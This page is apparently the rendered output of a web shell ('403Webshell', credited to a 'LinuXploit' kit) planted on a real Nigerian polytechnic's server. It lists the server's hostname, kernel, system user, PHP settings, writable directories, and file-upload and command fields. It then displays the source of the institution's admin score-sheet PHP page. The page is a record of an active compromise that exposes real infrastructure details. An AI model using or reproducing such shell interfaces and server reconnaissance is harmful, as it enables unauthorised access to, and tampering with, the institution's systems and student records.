403Webshell
Server IP : 172.64.80.1  /  Your IP : 172.70.131.125
Web Server : Apache
System : Linux mail.federalpolyede.edu.ng 5.10.0-32-amd64 #1 SMP Debian 5.10.223-1 (2024-08-10) x86_64
User : federalpolyede.edu.ng_idh35skikv ( 10000)
PHP Version : 7.4.33
Disable Function : opcache_get_status
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/vhosts/federalpolyede.edu.ng/httpdocs_backup/admin_main/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/vhosts/federalpolyede.edu.ng/httpdocs_backup/admin_main/scoreSheet.php
<?php
require_once('headMain_ord.php');
?>
<script type="text/javascript" language="javascript" src="../js/jquery-1.7.1.js"></script>
<script type="text/javascript" language="javascript" src="../js/scriptFileLong.js"></script>
<script type="text/javascript" language="javascript" src="../js/getNow.js"></script>

<!-- Page Content -->

<div class="row">
    <div class="col-lg-1"></div>
    <div class="col-lg-8">
        <div class="panel panel-default">
            <div class="panel-heading">
               Score Sheet
            </div>
            <div class="panel-body">

                <div class="row">
                    <div class="col-lg-12">

                        <table width="100%" cellspacing="5" cellpadding="3">
                            <tr>
                                <td><table width="100%" align="center" cellpadding="3" cellspacing="5">
                                        <tr>
                                            <td><fieldset>
                                                    <form role="form" method="post" action="scoreSheet_process.php">
                                                        <table width="100%" align="center" cellpadding="3" cellspacing="5">
                                                            <tr>
                                                                <td>School</td>
                                                                <td>&nbsp;</td>
                                                                <td><select name="school" id="school" class="form-control" >
                                                                        <?php
                                                                        $query="SELECT distinct dSchool FROM dept";
                                                                        $rs=$db->query($query);
                                                                        echo '<option>'.'Select Option...'.'</option>';
                                                                        while ($row=$rs->fetch(PDO::FETCH_BOTH)){
                                                                        //for($i=0;$i<mysql_num_rows($rs);$i++){
                                                                          //  $row=mysql_fetch_row($rs);

                                                                            echo '<option>'.$row[0].'</option>';
                                                                        }
                                                                        ?>
                                                                    </select></td>
                                                            </tr>
                                                            <tr>
                                                                <td>Department</td>
                                                                <td>&nbsp;</td>
                                                                <td><select name="dept" id="dept" class="form-control">
                                                                        <option>Select Option...</option>
                                                                    </select></td>
                                                            </tr>
                                                            <tr>

                                                                <td>Level</td>
                                                                <td >&nbsp;</td>
                                                                <td><label for="select"></label>
                                                                    <select name="level" id="level" class="form-control">
                                                                        <option value="1">ND 1 FT</option>
                                                                        <option value="2">ND 2 FT</option>
                                                                        <option value="3">HND 1 FT</option>
                                                                        <option value="4">HND 2 FT</option>
                                                                        <option value="5">ND PT YR 1</option>
                                                                        <option value="6">ND PT YR 2</option>
                                                                        <option value="7">ND PT YR 3</option>
                                                                        <option value="8">ND DPT 1</option>
                                                                        <option value="9">ND DPT 2</option>
                                                                        <option value="10">PRE ND</option>
                                                                    </select></td>
                                                            </tr>
                                                            <tr>
                                                                <td>Course Code</td>
                                                                <td>&nbsp;</td>
                                                                <td id="courseCode"><select name="courseCode" id="courseCode" class="form-control">
                                                                    </select></td>
                                                            </tr>
                                                            <tr>
                                                                <td>&nbsp;</td>
                                                                <td><p></p></td>
                                                                <td id="dept2"><input type="submit" class="btn-primary form-control" name="button" id="button" value="Go" /></td>
                                                            </tr>
                                                        </table>
                                                    </form>
                                                </fieldset></td>
                                        </tr>
                                    </table></td>
                            </tr>
                            <tr>
                                <td>&nbsp;</td>
                            </tr>
                        </table>

                    </div>
                    <!-- /.col-lg-12 -->
                </div>
                </div>
            </div>
        </div>
    </div>


    <!-- jQuery -->
    <script src="../bower_components/jquery/dist/jquery.min.js"></script>

    <!-- Bootstrap Core JavaScript -->
    <script src="../bower_components/bootstrap/dist/js/bootstrap.min.js"></script>

    <!-- Metis Menu Plugin JavaScript -->
    <script src="../bower_components/metisMenu/dist/metisMenu.min.js"></script>

    <!-- Custom Theme JavaScript -->
    <script src="../dist/js/sb-admin-2.js"></script>

</body>

</html>

Youez - 2016 - github.com/yon3zu
LinuXploit